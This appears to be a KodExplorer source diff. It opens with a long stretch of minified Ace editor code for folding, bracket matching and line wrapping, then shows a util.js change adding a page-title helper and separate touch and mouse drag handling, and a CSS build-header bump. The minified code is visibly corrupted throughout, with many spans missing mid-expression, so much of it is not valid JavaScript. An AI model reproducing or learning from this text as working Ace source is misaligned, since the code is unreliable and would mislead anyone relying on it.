e=[],t=this.ranges;t=t.sort(function(e,t){return i(e.start,t.start)});var n=t[0],r;for(var s=1;s=0},this.containsPoint=function(e){return this.pointIndex(e)>=0},this.rangeAtPoint=function(e){var t=this.pointIndex(e);if(t>=0)return this.ranges[t]},this.clipRows=function(e,t){var n=this.ranges;if(n[0].start.row>t||n[n.length-1].start.rowr)break;l.start.row==r&&l.start.column>=t.column&&(l.start.column!=t.column||!this.$insertRight)&&(l.start.column+=o,l.start.row+=s);if(l.end.row==r&&l.end.column>=t.column){if(l.end.column==t.column&&this.$insertRight)continue;l.end.column==t.column&&o>0&&al.start.column&&l.end.column==u[a+1].start.column&&(l.end.column-=o),l.end.column+=o,l.end.row+=s}}if(s!=0&&a=e)return i;if(i.end.row>e)return null}return null},this.getNextFoldLine=function(e,t){var n=this.$foldData,r=0;t&&(r=n.indexOf(t)),r==-1&&(r=0);for(r;r=e)return i}return null},this.getFoldedRowCount=function(e,t){var n=this.$foldData,r=t-e+1;for(var i=0;i=t){u=e?r-=t-u:r=0);break}o>=e&&(u>=e?r-=o-u:r-=o-e+1)}return r},this.$addFoldLine=function(e){return this.$foldData.push(e),this.$foldData.sort(function(e,t){return e.start.row-t.start.row}),e},this.addFold=function(e,t){var n=this.$foldData,r=!1,o;e instanceof s?o=e:(o=new s(t,e),o.collapseChildren=t.collapseChildren),this.$clipRangeToDocument(o.range);var u=o.start.row,a=o.start.column,f=o.end.row,l=o.end.column;if(u0&&(this.removeFolds(p),p.forEach(function(e){o.addSubFold(e)}));for(var d=0;d0&&this.foldAll(e.start.row+1,e.end.row,e.collapseChildren-1),e.subFolds=[]},this.expandFolds=function(e){e.forEach(function(e){this.expandFold(e)},this)},this.unfold=function(e,t){var n,i;e==null?(n=new r(0,0,this.getLength(),0),t=!0):typeof e=="number"?n=new r(e,0,e,this.getLine(e).length):"row"in e?n=r.fromPoints(e,e):n=e,i=this.getFoldsInRangeList(n);if(t)this.removeFolds(i);else{var s=i;while(s.length)this.expandFolds(s),s=this.getFoldsInRangeList(n)}if(i.length)return i},this.isRowFolded=function(e,t){return!!this.getFoldLine(e,t)},this.getRowFoldEnd=function(e,t){var n=this.getFoldLine(e,t);return n?n.end.row:e},this.getRowFoldStart=function(e,t){var n=this.getFoldLine(e,t);return n?n.start.row:e},this.getFoldDisplayLine=function(e,t,n,r,i){r==null&&(r=e.start.row),i==null&&(i=0),t==null&&(t=e.end.row),n==null&&(n=this.getLine(t).length);var s=this.doc,o="";return e.walk(function(e,t,n,u){if(t=e){i=s.end.row;try{var o=this.addFold("...",s);o&&(o.collapseChildren=n)}catch(u){}}}},this.$foldStyles={manual:1,markbegin:1,markbeginend:1},this.$foldStyle="markbegin",this.setFoldStyle=function(e){if(!this.$foldStyles[e])throw new Error("invalid fold style: "+e+"["+Object.keys(this.$foldStyles).join(", ")+"]");if(this.$foldStyle==e)return;this.$foldStyle=e,e=="manual"&&this.unfold();var t=this.$foldMode;this.$setFolding(null),this.$setFolding(t)},this.$setFolding=function(e){if(this.$foldMode==e)return;this.$foldMode=e,this.off("change",this.$updateFoldWidgets),this.off("tokenizerUpdate",this.$tokenizerUpdateFoldWidgets),this._signal("changeAnnotation");if(!e||this.$foldStyle=="manual"){this.foldWidgets=null;return}this.foldWidgets=[],this.getFoldWidget=e.getFoldWidget.bind(e,this,this.$foldStyle),this.getFoldWidgetRange=e.getFoldWidgetRange.bind(e,this,this.$foldStyle),this.$updateFoldWidgets=this.updateFoldWidgets.bind(this),this.$tokenizerUpdateFoldWidgets=this.tokenizerUpdateFoldWidgets.bind(this),this.on("change",this.$updateFoldWidgets),this.on("tokenizerUpdate",this.$tokenizerUpdateFoldWidgets)},this.getParentFoldRangeData=function(e,t){var n=this.foldWidgets;if(!n||t&&n[e])return{};var r=e-1,i;while(r>=0){var s=n[r];s==null&&(s=n[r]=this.getFoldWidget(r));if(s=="start"){var o=this.getFoldWidgetRange(r);i||(i=o);if(o&&o.end.row>=e)break}r--}return{range:r!==-1&&o,firstRange:i}},this.onFoldWidgetClick=function(e,t){t=t.domEvent;var n={children:t.shiftKey,all:t.ctrlKey||t.metaKey,siblings:t.altKey},r=this.$toggleFoldWidget(e,n);if(!r){var i=t.target||t.srcElement;i&&/ace_fold-widget/.test(i.className)&&(i.className+=" ace_invalid")}},this.$toggleFoldWidget=function(e,t){if(!this.getFoldWidget)return;var n=this.getFoldWidget(e),r=this.getLine(e),i=n==="end"?-1:1,s=this.getFoldAt(e,i===-1?0:r.length,i);if(s)return t.children||t.all?this.removeFold(s):this.expandFold(s),s;var o=this.getFoldWidgetRange(e,!0);if(o&&!o.isMultiLine()){s=this.getFoldAt(o.start.row,o.start.column,1);if(s&&o.isEqual(s.range))return this.removeFold(s),s}if(t.siblings){var u=this.getParentFoldRangeData(e);if(u.range)var a=u.range.start.row+1,f=u.range.end.row;this.foldAll(a,f,t.all?1e4:0)}else t.children?(f=o?o.end.row:this.getLength(),this.foldAll(e+1,f,t.all?1e4:0)):o&&(t.all&&(o.collapseChildren=1e4),this.addFold("...",o));return o},this.toggleFoldWidget=function(e){var t=this.selection.getCursor().row;t=this.getRowFoldStart(t);var n=this.$toggleFoldWidget(t,{});if(n)return;var r=this.getParentFoldRangeData(t,!0);n=r.range||r.firstRange;if(n){t=n.start.row;var i=this.getFoldAt(t,this.getLine(t).length,1);i?this.removeFold(i):this.addFold("...",n)}},this.updateFoldWidgets=function(e){var t=e.start.row,n=e.end.row-t;if(n===0)this.foldWidgets[t]=null;else if(e.action=="remove")this.foldWidgets.splice(t,n+1,null);else{var r=Array(n+1);r.unshift(t,1),this.foldWidgets.splice.apply(this.foldWidgets,r)}},this.tokenizerUpdateFoldWidgets=function(e){var t=e.data;t.first!=t.last&&this.foldWidgets.length>t.first&&this.foldWidgets.splice(t.first,this.foldWidgets.length)}}var r=e("../range").Range,i=e("./fold_line").FoldLine,s=e("./fold").Fold,o=e("../token_iterator").TokenIterator;t.Folding=u}),ace.define("ace/edit_session/bracket_match",["require","exports","module","ace/token_iterator","ace/range"],function(e,t,n){"use strict";function s(){this.findMatchingBracket=function(e,t){if(e.column==0)return null;var n=t||this.getLine(e.row).charAt(e.column-1);if(n=="")return null;var r=n.match(/([\(\[\{])|([\)\]\}])/);return r?r[1]?this.$findClosingBracket(r[1],e):this.$findOpeningBracket(r[2],e):null},this.getBracketRange=function(e){var t=this.getLine(e.row),n=!0,r,s=t.charAt(e.column-1),o=s&&s.match(/([\(\[\{])|([\)\]\}])/);o||(s=t.charAt(e.column),e={row:e.row,column:e.column+1},o=s&&s.match(/([\(\[\{])|([\)\]\}])/),n=!1);if(!o)return null;if(o[1]){var u=this.$findClosingBracket(o[1],e);if(!u)return null;r=i.fromPoints(e,u),n||(r.end.column++,r.start.column--),r.cursor=r.end}else{var u=this.$findOpeningBracket(o[2],e);if(!u)return null;r=i.fromPoints(u,e),n||(r.start.column++,r.end.column--),r.cursor=r.start}return r},this.$brackets={")":"(","(":")","]":"[","[":"]","{":"}","}":"{"},this.$findOpeningBracket=function(e,t,n){var i=this.$brackets[e],s=1,o=new r(this,t.row,t.column),u=o.getCurrentToken();u||(u=o.stepForward());if(!u)return;n||(n=new RegExp("(\\.?"+u.type.replace(".","\\.").replace("rparen",".paren").replace(/\b(?:end)\b/,"(?:start|begin|end)")+")+"));var a=t.column-o.getCurrentTokenColumn()-2,f=u.value;for(;;){while(a>=0){var l=f.charAt(a);if(l==i){s-=1;if(s==0)return{row:o.getCurrentTokenRow(),column:a+o.getCurrentTokenColumn()}}else l==e&&(s+=1);a-=1}do u=o.stepBackward();while(u&&!n.test(u.type));if(u==null)break;f=u.value,a=f.length-1}return null},this.$findClosingBracket=function(e,t,n){var i=this.$brackets[e],s=1,o=new r(this,t.row,t.column),u=o.getCurrentToken();u||(u=o.stepForward());if(!u)return;n||(n=new RegExp("(\\.?"+u.type.replace(".","\\.").replace("lparen",".paren").replace(/\b(?:start|begin)\b/,"(?:start|begin|end)")+")+"));var a=t.column-o.getCurrentTokenColumn();for(;;){var f=u.value,l=f.length;while(a=4352&&e<=4447||e>=4515&&e<=4519||e>=4602&&e<=4607||e>=9001&&e<=9002||e>=11904&&e<=11929||e>=11931&&e<=12019||e>=12032&&e<=12245||e>=12272&&e<=12283||e>=12288&&e<=12350||e>=12353&&e<=12438||e>=12441&&e<=12543||e>=12549&&e<=12589||e>=12593&&e<=12686||e>=12688&&e<=12730||e>=12736&&e<=12771||e>=12784&&e<=12830||e>=12832&&e<=12871||e>=12880&&e<=13054||e>=13056&&e<=19903||e>=19968&&e<=42124||e>=42128&&e<=42182||e>=43360&&e<=43388||e>=44032&&e<=55203||e>=55216&&e<=55238||e>=55243&&e<=55291||e>=63744&&e<=64255||e>=65040&&e<=65049||e>=65072&&e<=65106||e>=65108&&e<=65126||e>=65128&&e<=65131||e>=65281&&e<=65376||e>=65504&&e<=65510}r.implement(this,o),this.setDocument=function(e){this.doc&&this.doc.removeListener("change",this.$onChange),this.doc=e,e.on("change",this.$onChange),this.bgTokenizer&&this.bgTokenizer.setDocument(this.getDocument()),this.resetCaches()},this.getDocument=function(){return this.doc},this.$resetRowCache=function(e){if(!e){this.$docRowCache=[],this.$screenRowCache=[];return}var t=this.$docRowCache.length,n=this.$getRowCacheIndex(this.$docRowCache,e)+1;t>n&&(this.$docRowCache.splice(n,t),this.$screenRowCache.splice(n,t))},this.$getRowCacheIndex=function(e,t){var n=0,r=e.length-1;while(n<=r){var i=n+r>>1,s=e[i];if(t>s)n=i+1;else{if(!(t=t)break}return r=n[s],r?(r.index=s,r.start=i-r.value.length,r):null},this.setUndoManager=function(e){this.$undoManager=e,this.$deltas=[],this.$deltasDoc=[],this.$deltasFold=[],this.$informUndoManager&&this.$informUndoManager.cancel();if(e){var t=this;this.$syncInformUndoManager=function(){t.$informUndoManager.cancel(),t.$deltasFold.length&&(t.$deltas.push({group:"fold",deltas:t.$deltasFold}),t.$deltasFold=[]),t.$deltasDoc.length&&(t.$deltas.push({group:"doc",deltas:t.$deltasDoc}),t.$deltasDoc=[]),t.$deltas.length>0&&e.execute({action:"aceupdate",args:[t.$deltas,t],merge:t.mergeUndoDeltas}),t.mergeUndoDeltas=!1,t.$deltas=[]},this.$informUndoManager=i.delayedCall(this.$syncInformUndoManager)}},this.markUndoGroup=function(){this.$syncInformUndoManager&&this.$syncInformUndoManager()},this.$defaultUndoManager={undo:function(){},redo:function(){},reset:function(){}},this.getUndoManager=function(){return this.$undoManager||this.$defaultUndoManager},this.getTabString=function(){return this.getUseSoftTabs()?i.stringRepeat(" ",this.getTabSize()):" "},this.setUseSoftTabs=function(e){this.setOption("useSoftTabs",e)},this.getUseSoftTabs=function(){return this.$useSoftTabs&&!this.$mode.$indentWithTabs},this.setTabSize=function(e){this.setOption("tabSize",e)},this.getTabSize=function(){return this.$tabSize},this.isTabStop=function(e){return this.$useSoftTabs&&e.column%this.$tabSize===0},this.$overwrite=!1,this.setOverwrite=function(e){this.setOption("overwrite",e)},this.getOverwrite=function(){return this.$overwrite},this.toggleOverwrite=function(){this.setOverwrite(!this.$overwrite)},this.addGutterDecoration=function(e,t){this.$decorations[e]||(this.$decorations[e]=""),this.$decorations[e]+=" "+t,this._signal("changeBreakpoint",{})},this.removeGutterDecoration=function(e,t){this.$decorations[e]=(this.$decorations[e]||"").replace(" "+t,""),this._signal("changeBreakpoint",{})},this.getBreakpoints=function(){return this.$breakpoints},this.setBreakpoints=function(e){this.$breakpoints=[];for(var t=0;t0&&(r=!!n.charAt(t-1).match(this.tokenRe)),r||(r=!!n.charAt(t).match(this.tokenRe));if(r)var i=this.tokenRe;else if(/^\s+$/.test(n.slice(t-1,t+1)))var i=/\s/;else var i=this.nonTokenRe;var s=t;if(s>0){do s--;while(s>=0&&n.charAt(s).match(i));s++}var o=t;while(oe&&(e=t.screenWidth)}),this.lineWidgetWidth=e},this.$computeWidth=function(e){if(this.$modified||e){this.$modified=!1;if(this.$useWrapMode)return this.screenWidth=this.$wrapLimit;var t=this.doc.getAllLines(),n=this.$rowLengthCache,r=0,i=0,s=this.$foldData[i],o=s?s.start.row:Infinity,u=t.length;for(var a=0;ao){a=s.end.row+1;if(a>=u)break;s=this.$foldData[i++],o=s?s.start.row:Infinity}n[a]==null&&(n[a]=this.$getStringScreenWidth(t[a])[0]),n[a]>r&&(r=n[a])}this.screenWidth=r}},this.getLine=function(e){return this.doc.getLine(e)},this.getLines=function(e,t){return this.doc.getLines(e,t)},this.getLength=function(){return this.doc.getLength()},this.getTextRange=function(e){return this.doc.getTextRange(e||this.selection.getRange())},this.insert=function(e,t){return this.doc.insert(e,t)},this.remove=function(e){return this.doc.remove(e)},this.removeFullLines=function(e,t){return this.doc.removeFullLines(e,t)},this.undoChanges=function(e,t){if(!e.length)return;this.$fromUndo=!0;var n=null;for(var r=e.length-1;r!=-1;r--){var i=e[r];i.group=="doc"?(this.doc.revertDeltas(i.deltas),n=this.$getUndoSelection(i.deltas,!0,n)):i.deltas.forEach(function(e){this.addFolds(e.folds)},this)}return this.$fromUndo=!1,n&&this.$undoSelect&&!t&&this.selection.setSelectionRange(n),n},this.redoChanges=function(e,t){if(!e.length)return;this.$fromUndo=!0;var n=null;for(var r=0;re.end.column&&(s.start.column+=u),s.end.row==e.end.row&&s.end.column>e.end.column&&(s.end.column+=u)),o&&s.start.row>=e.end.row&&(s.start.row+=o,s.end.row+=o)}s.end=this.insert(s.start,r);if(i.length){var a=e.start,l=s.start,o=l.row-a.row,u=l.column-a.column;this.addFolds(i.map(function(e){return e=e.clone(),e.start.row==a.row&&(e.start.column+=u),e.end.row==a.row&&(e.end.column+=u),e.start.row+=o,e.end.row+=o,e}))}return s},this.indentRows=function(e,t,n){n=n.replace(/\t/g,this.getTabString());for(var r=e;r<=t;r++)this.doc.insertInLine({row:r,column:0},n)},this.outdentRows=function(e){var t=e.collapseRows(),n=new f(0,0,0,0),r=this.getTabSize();for(var i=t.start.row;i<=t.end.row;++i){var s=this.getLine(i);n.start.row=i,n.end.row=i;for(var o=0;o0){var r=this.getRowFoldEnd(t+n);if(r>this.doc.getLength()-1)return 0;var i=r-t}else{e=this.$clipRowToDocument(e),t=this.$clipRowToDocument(t);var i=t-e+1}var s=new f(e,0,t,Number.MAX_VALUE),o=this.getFoldsInRange(s).map(function(e){return e=e.clone(),e.start.row+=i,e.end.row+=i,e}),u=n==0?this.doc.getLines(e,t):this.doc.removeFullLines(e,t);return this.doc.insertFullLines(e+i,u),o.length&&this.addFolds(o),i},this.moveLinesUp=function(e,t){return this.$moveLines(e,t,-1)},this.moveLinesDown=function(e,t){return this.$moveLines(e,t,1)},this.duplicateLines=function(e,t){return this.$moveLines(e,t,0)},this.$clipRowToDocument=function(e){return Math.max(0,Math.min(e,this.doc.getLength()-1))},this.$clipColumnToRow=function(e,t){return t<0?0:Math.min(this.doc.getLine(e).length,t)},this.$clipPositionToDocument=function(e,t){t=Math.max(0,t);if(e<0)e=0,t=0;else{var n=this.doc.getLength();e>=n?(e=n-1,t=this.doc.getLine(n-1).length):t=Math.min(this.doc.getLine(e).length,t)}return{row:e,column:t}},this.$clipRangeToDocument=function(e){e.start.row<0?(e.start.row=0,e.start.column=0):e.start.column=this.$clipColumnToRow(e.start.row,e.start.column);var t=this.doc.getLength()-1;return e.end.row>t?(e.end.row=t,e.end.column=this.doc.getLine(t).length):e.end.column=this.$clipColumnToRow(e.end.row,e.end.column),e},this.$wrapLimit=80,this.$useWrapMode=!1,this.$wrapLimitRange={min:null,max:null},this.setUseWrapMode=function(e){if(e!=this.$useWrapMode){this.$useWrapMode=e,this.$modified=!0,this.$resetRowCache(0);if(e){var t=this.getLength();this.$wrapData=Array(t),this.$updateWrapData(0,t-1)}this._signal("changeWrapMode")}},this.getUseWrapMode=function(){return this.$useWrapMode},this.setWrapLimitRange=function(e,t){if(this.$wrapLimitRange.min!==e||this.$wrapLimitRange.max!==t)this.$wrapLimitRange={min:e,max:t},this.$modified=!0,this.$useWrapMode&&this._signal("changeWrapMode")},this.adjustWrapLimit=function(e,t){var n=this.$wrapLimitRange;n.max<0&&(n={min:t,max:t});var r=this.$constrainWrapLimit(e,n.min,n.max);return r!=this.$wrapLimit&&r>1?(this.$wrapLimit=r,this.$modified=!0,this.$useWrapMode&&(this.$updateWrapData(0,this.getLength()-1),this.$resetRowCache(0),this._signal("changeWrapLimit")),!0):!1},this.$constrainWrapLimit=function(e,t,n){return t&&(e=Math.max(t,e)),n&&(e=Math.min(n,e)),e},this.getWrapLimit=function(){return this.$wrapLimit},this.setWrapLimit=function(e){this.setWrapLimitRange(e,e)},this.getWrapLimitRange=function(){return{min:this.$wrapLimitRange.min,max:this.$wrapLimitRange.max}},this.$updateInternalDataOnChange=function(e){var t=this.$useWrapMode,n=e.action,r=e.start,i=e.end,s=r.row,o=i.row,u=o-s,a=null;this.$updating=!0;if(u!=0)if(n==="remove"){this[t?"$wrapData":"$rowLengthCache"].splice(s,u);var f=this.$foldData;a=this.getFoldsInRange(e),this.removeFolds(a);var l=this.getFoldLine(i.row),c=0;if(l){l.addRemoveChars(i.row,i.column,r.column-i.column),l.shiftRow(-u);var h=this.getFoldLine(s);h&&h!==l&&(h.merge(l),l=h),c=f.indexOf(l)+1}for(c;c=i.row&&l.shiftRow(-u)}o=s}else{var p=Array(u);p.unshift(s,0);var d=t?this.$wrapData:this.$rowLengthCache;d.splice.apply(d,p);var f=this.$foldData,l=this.getFoldLine(s),c=0;if(l){var v=l.range.compareInside(r.row,r.column);v==0?(l=l.split(r.row,r.column),l&&(l.shiftRow(u),l.addRemoveChars(o,0,i.column-r.column))):v==-1&&(l.addRemoveChars(s,0,i.column-r.column),l.shiftRow(u)),c=f.indexOf(l)+1}for(c;c=s&&l.shiftRow(u)}}else{u=Math.abs(e.start.column-e.end.column),n==="remove"&&(a=this.getFoldsInRange(e),this.removeFolds(a),u=-u);var l=this.getFoldLine(s);l&&l.addRemoveChars(s,r.column,u)}return t&&this.$wrapData.length!=this.doc.getLength()&&console.error("doc.getLength() and $wrapData.length have to be the same!"),this.$updating=!1,t?this.$updateWrapData(s,o):this.$updateRowLengthCache(s,o),a},this.$updateRowLengthCache=function(e,t,n){this.$rowLengthCache[e]=null,this.$rowLengthCache[t]=null},this.$updateWrapData=function(e,t){var r=this.doc.getAllLines(),i=this.getTabSize(),s=this.$wrapData,o=this.$wrapLimit,a,f,l=e;t=Math.min(t,r.length-1);while(l<=t)f=this.getFoldLine(l,f),f?(a=[],f.walk(function(e,t,i,s){var o;if(e!=null){o=this.$getDisplayTokens(e,a.length),o[0]=n;for(var f=1;fr-b){var w=a+r-b;if(e[w-1]>=p&&e[w]>=p){y(w);continue}if(e[w]==n||e[w]==u){for(w;w!=a-1;w--)if(e[w]==n)break;if(w>a){y(w);continue}w=a+r;for(w;w>2)),a-1);while(w>E&&e[w]E&&e[w]E&&e[w]==l)w--}else while(w>E&&e[w]E){ //warlee if(oldLength == o-a){break;} oldLength = o-a; diff --git a/static/js/lib/util.js b/static/js/lib/util.js index 8a68bae..0b119a7 100755 --- a/static/js/lib/util.js +++ b/static/js/lib/util.js @@ -870,6 +870,21 @@ var Tips = (function(){ } })(); +var Title = (function(){ + var oldTitle = document.title; + var reset = function(){ + document.title = oldTitle; + } + var set = function(msg){ + document.title = msg + ' ' +oldTitle; + } + return { + reset:reset, + set:set + } +})(); + + //获取keys var objectKeys = function(obj){ var keys = []; @@ -1271,33 +1286,36 @@ var MaskView = (function(){ var offsetY = 0; var $that = $(this); - $that.die('mousedown').live('mousedown',function(e){ - if (e.which != 1) return true; - dragStart(e); - if($that.setCapture) $that.setCapture(); - $(document).mousemove(function(e) {dragMove(e);}); - $(document).one('mouseup',function(e) { + if(isWap()){ + //移动端拖拽支持 + $that.unbind('mousedown').on('touchstart',function(e){ + dragStart(e); + }).unbind('touchmove').on('touchmove',function(e){ + dragMove(e); + }).unbind('touchend').on('touchend',function(e){ dragEnd(e); - if($that.releaseCapture) {$that.releaseCapture();} stopPP(e); return false; }); - if(isStopPP){//指定不冒泡才停止向上冒泡。split拖拽调整宽度,父窗口拖拽框选防止冒泡 - stopPP(e);return false; - } - //stopPP(e);return false;//跨iframe导致事件屏蔽问题 - }); - - //移动端拖拽支持 - $that.on('touchstart',function(e){ - dragStart(e); - }).on('touchmove',function(e){ - dragMove(e); - }).on('touchend',function(e){ - dragEnd(e); - stopPP(e); - return false; - }); + }else{ + $that.die('mousedown').live('mousedown',function(e){ + if (e.which != 1) return true; + dragStart(e); + if($that.setCapture) $that.setCapture(); + $(document).mousemove(function(e) {dragMove(e);}); + $(document).one('mouseup',function(e) { + dragEnd(e); + if($that.releaseCapture) {$that.releaseCapture();} + stopPP(e); + return false; + }); + if(isStopPP){//指定不冒泡才停止向上冒泡。split拖拽调整宽度,父窗口拖拽框选防止冒泡 + stopPP(e);return false; + } + //stopPP(e);return false;//跨iframe导致事件屏蔽问题 + }); + } + var getEvent = function(e){ if( e.originalEvent && e.originalEvent.targetTouches){ @@ -1310,6 +1328,8 @@ var MaskView = (function(){ isDraging = true; mouseFirstX = mouse.pageX; mouseFirstY = mouse.pageY; + offsetX = 0; + offsetY = 0; if (typeof(obj["start"]) == 'function'){ obj["start"](e,$that); } diff --git a/static/style/skin/alpha_image.css b/static/style/skin/alpha_image.css index 16c85dd..2c4bc20 100755 --- a/static/style/skin/alpha_image.css +++ b/static/style/skin/alpha_image.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738071.4865] */ +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100996.3739] */ body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-left:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcolor-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{backgr